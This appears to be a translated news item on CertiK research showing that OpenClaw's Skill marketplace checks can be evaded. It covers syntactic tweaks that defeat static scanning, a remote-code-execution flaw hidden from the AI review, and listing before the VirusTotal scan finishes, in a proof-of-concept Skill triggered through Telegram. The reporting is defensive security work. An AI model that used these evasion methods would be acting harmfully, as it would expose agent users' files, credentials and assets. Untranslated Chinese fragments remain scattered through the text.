Recently, the open-source self-hosted AI agent platform OpenClaw (commonly known as "Crawfish") has rapidly gained popularity due to its flexible scalability and self-controlled deployment features, becoming a phenomenon in the personal AI agent space. Its core ecosystem, Clawhub, serves as an app marketplace, gathering a vast number of third-party Skill plugins that enable agents to unlock advanced capabilities—from web search and content creation to encrypted wallet operations, on-chain interactions, and system automation—with a single click. The ecosystem's scale and user base have experienced explosive growth.
But for such third-party Skills running in high-privilege environments, where exactly is the platform's real security boundary?
Recently, CertiK, the world's largest Web3 security company, released new research on Skill security. The report points out that the current market has a misplaced perception of the security boundaries of AI agent ecosystems: the industry generally regards "Skill scanning" as the core security boundary, but this mechanism is almost useless against hacker attacks.
If OpenClaw is compared to an operating system for smart devices, Skills are the various APPs installed on the system. Unlike ordinary consumer APPs, some Skills in OpenClaw run in high-privilege environments, directly accessing local files, calling system tools, connecting to external services, executing host environment commands, and even operating users' encrypted digital assets. Once security issues arise, they can directly lead to serious consequences such as sensitive information leakage, remote device takeover, and theft of digital assets.
The current universal security solution for third-party Skills across the industry is "pre-listing scanning and review." OpenClaw's Clawhub has also built a three-layer review and protection system: integrating VirusTotal code scanning, static code detection engines, and AI logic consistency checks. It uses risk grading to push security alerts to users, attempting to safeguard ecosystem security. However, CertiK's research and proof-of-concept attack tests confirm that this detection system has shortcomings in real attack-defense scenarios and cannot bear the core responsibility of security protection.
The research first breaks down the inherent limitations of the existing detection mechanisms:
Static detection rules are easily bypassed. This engine primarily relies on matching code features to identify risks, such as flagging the combination of "reading sensitive environmental information + sending network requests" as high-risk behavior. However, attackers only need to make slight syntactic modifications to the code to completely bypass feature matching while fully retaining malicious logic. It's like rephrasing dangerous content with synonymous expressions, rendering the security scanner completely ineffective.
AI review has inherent detection blind spots. Clawhub's AI review is primarily positioned as a "logic consistency detector," which can only catch obvious malicious code where "declared functionality does not match actual behavior." However, it is helpless against exploitable vulnerabilities hidden within normal business logic, much like how it is difficult to find fatal traps buried deep in the clauses of a seemingly compliant contract.
More critically, the review process has underlying design flaws: even when VirusTotal's scan results are still "pending" and the full "health check" process is incomplete, Skills can still be directly listed publicly. Users can install them without any warnings, leaving an opening for attackers.
To verify the real危害性 of the risks, the CertiK research team completed full testing. The team developed a Skill named "test-web-searcher," which表面上 appears to be a fully compliant web search tool with code logic that完全符合常规开发规范. However, it actually implants a remote code execution vulnerability within the normal functional flow.
This Skill bypassed the detection of both the static engine and the AI review. While the VirusTotal scan was still pending, it was installed normally without any security warnings. Ultimately, by sending a remote command via Telegram, the vulnerability was successfully triggered, achieving arbitrary command execution on the host device (in the demo, it directly controlled the system to launch the calculator).
CertiK clearly stated in the research that these issues are not unique product bugs of OpenClaw but rather a common cognitive误区 across the AI agent industry: the industry普遍 regards "review scanning" as the core security防线, while neglecting the true security根基, which is runtime mandatory isolation and fine-grained permission control. This is similar to how the security core of Apple's iOS ecosystem has never been the strict review of the App Store, but rather the system's enforced sandbox mechanism and fine-grained permission management, ensuring each APP runs in its dedicated "isolation pod" without随意获取系统权限. OpenClaw's existing sandbox mechanism is optional而非强制的 and highly reliant on manual user configuration. Most users, to ensure Skill functionality, choose to disable the sandbox, ultimately leaving the agent in a "naked" state. Once a Skill with vulnerabilities or malicious code is installed, it can directly lead to catastrophic consequences.
Regarding the issues discovered, CertiK also provided security guidance:
● For developers of AI agents like OpenClaw, sandbox isolation must be set as the default mandatory configuration for third-party Skills, with a fine-grained permission control model. Third-party code must never默认继承 the host machine's high privileges.
● For ordinary users, Skills labeled "safe" in the marketplace merely indicate that no risks were detected; it does not equate to absolute safety. Before官方 makes底层强隔离机制 the default configuration, it is recommended to deploy OpenClaw on non-critical idle devices or virtual machines. Never let it near sensitive files, password credentials, or high-value加密资产.
The AI agent赛道 is currently on the eve of explosion. The speed of ecosystem expansion must not outpace the pace of security construction. Review scanning can only block初级恶意攻击 but can never become the security boundary for high-privilege agents. Only by shifting from "pursuing perfect detection" to "assuming risk exists and focusing on damage containment," and by establishing隔离边界强制 at the runtime底层, can the security底线 of AI agents truly be safeguarded, allowing this technological transformation to proceed steadily and go the distance.
Original Research: https://x.com/hhj4ck/status/2033527312042315816?s=20
https://mp.weixin.qq.com/s/Wxrzt7bAo86h3bOKkx6 UoA





